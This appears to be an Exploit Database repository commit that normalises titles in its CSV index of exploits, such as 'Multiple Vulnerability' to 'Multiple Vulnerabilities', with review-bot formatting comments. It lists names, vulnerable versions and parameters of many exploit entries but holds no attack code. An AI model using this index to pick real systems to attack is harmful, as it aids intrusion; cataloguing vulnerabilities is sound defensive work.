DB: 2016-03-17

5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities

AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
Offensive Security 2016-03-17 07:07:56 +00:00
parent 48534c54b0
commit 477bcbdcc0
7877 changed files with 590387 additions and 589604 deletions


@ -3327,7 +3327,7 @@ id,file,description,date,author,platform,type,port
3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0
3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0
3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0 3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0
3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0 3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0
3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0
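Review bot: the new title for row 3671 drops the word "Exploit" as well as fixing the plural, although the entry's file is a script (3671.php) and rows 3670 and 3672 in the same hunk keep their "Exploit" suffix. If only the "Multiple Vulnerability" wording was meant to change, keep the suffix, or state in the commit message that it is being dropped on purpose so that title-based filtering on "Exploit" is not silently affected.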
@ -10002,7 +10002,7 @@ id,file,description,date,author,platform,type,port
10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0 10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0
10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0 10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0
10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80 10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS Multiple Vulnerability",2009-12-30,emgent,hardware,webapps,80 10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0 10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0
10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
@ -10487,7 +10487,7 @@ id,file,description,date,author,platform,type,port
11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0
11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0
11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0 11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0
11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0
11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0
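Review bot: in row 11452 the relocated parenthetical still reads "(RFI / SQL)", which names a language rather than a vulnerability class. Row 11449 in this hunk spells it "SQL Injection", so "(RFI / SQL Injection)" would match the surrounding titles and keep keyword searches for "SQL Injection" hitting this entry.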
@ -10875,7 +10875,7 @@ id,file,description,date,author,platform,type,port
11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0 11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0
11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0 11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0 11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0
11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0 11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0
11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0 11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0
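Review bot: row 11894 still uses the distribution archive name "cmsfaethon-2.2.0-ultimate.7z" as the product field; only the separator and plural were fixed. Since the title is being touched anyway, split it into product name and version in the same form as neighbouring rows such as "Kasseler CMS 1.4.x lite", so version matching against the title does not have to parse a file name with a ".7z" extension.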
@ -10978,7 +10978,7 @@ id,file,description,date,author,platform,type,port
12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0 12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0 12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0
12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
@ -11182,7 +11182,7 @@ id,file,description,date,author,platform,type,port
12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0
12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0
15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0
12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0
12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0
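Review bot: row 12241 keeps "(DIR_LIBS)" before the " - " separator, while this same commit moves the parenthetical detail after the separator in rows 11452 and 12018. Pick one placement and apply it here too, for example "Nucleus CMS 3.51 - (DIR_LIBS) Multiple Vulnerabilities", otherwise the normalisation leaves two competing title layouts.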
@ -11233,7 +11233,7 @@ id,file,description,date,author,platform,type,port
12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0 12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0
12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0 12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0
12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0
12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0
12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
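Review bot: the new title in row 12295 now contains two " - " separators ("N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities"), so anything that splits the description on the first separator gets "N/X" as the product and loses the version. Consider folding the product into one field ahead of a single separator, keeping the name and version exactly as the entry gives them.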
@ -11377,7 +11377,7 @@ id,file,description,date,author,platform,type,port
12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0
12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0 12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0 12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0
12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0 12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0
@ -11587,7 +11587,7 @@ id,file,description,date,author,platform,type,port
12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0
12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0 12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
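Review bot: row 12694 in this hunk's trailing context still reads "Tochin Ecommerce Multiple Remote Vulnerability", the same singular "Multiple ... Vulnerability" wording and missing " - " separator that the change to row 14322 corrects. If the cleanup was driven by an exact match on "Multiple Vulnerability", widen the pattern so variants with a word in between are caught in the same pass.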
@ -11626,7 +11626,7 @@ id,file,description,date,author,platform,type,port
12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0 12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0
12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0
12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0
12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0 12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0
12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0 12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0
12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0 12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0
12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
@ -12562,7 +12562,7 @@ id,file,description,date,author,platform,type,port
14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0 14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0
14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0
14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0 14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0
14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0 14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0
14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0 14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0
14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0
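Review bot: row 14281 in the leading context of this hunk still has the misspelling "Vulnerabilty" ("KMSoft GB SQL Injection Vulnerabilty"), which a title cleanup like the one applied to row 14284 should also catch. A spell check over the description column would be a cheap addition to this normalisation pass.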
@ -12587,7 +12587,7 @@ id,file,description,date,author,platform,type,port
14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0
14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0
14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0 14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0
14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0 14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0
@ -15550,7 +15550,7 @@ id,file,description,date,author,platform,type,port
17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0 17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0
17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0
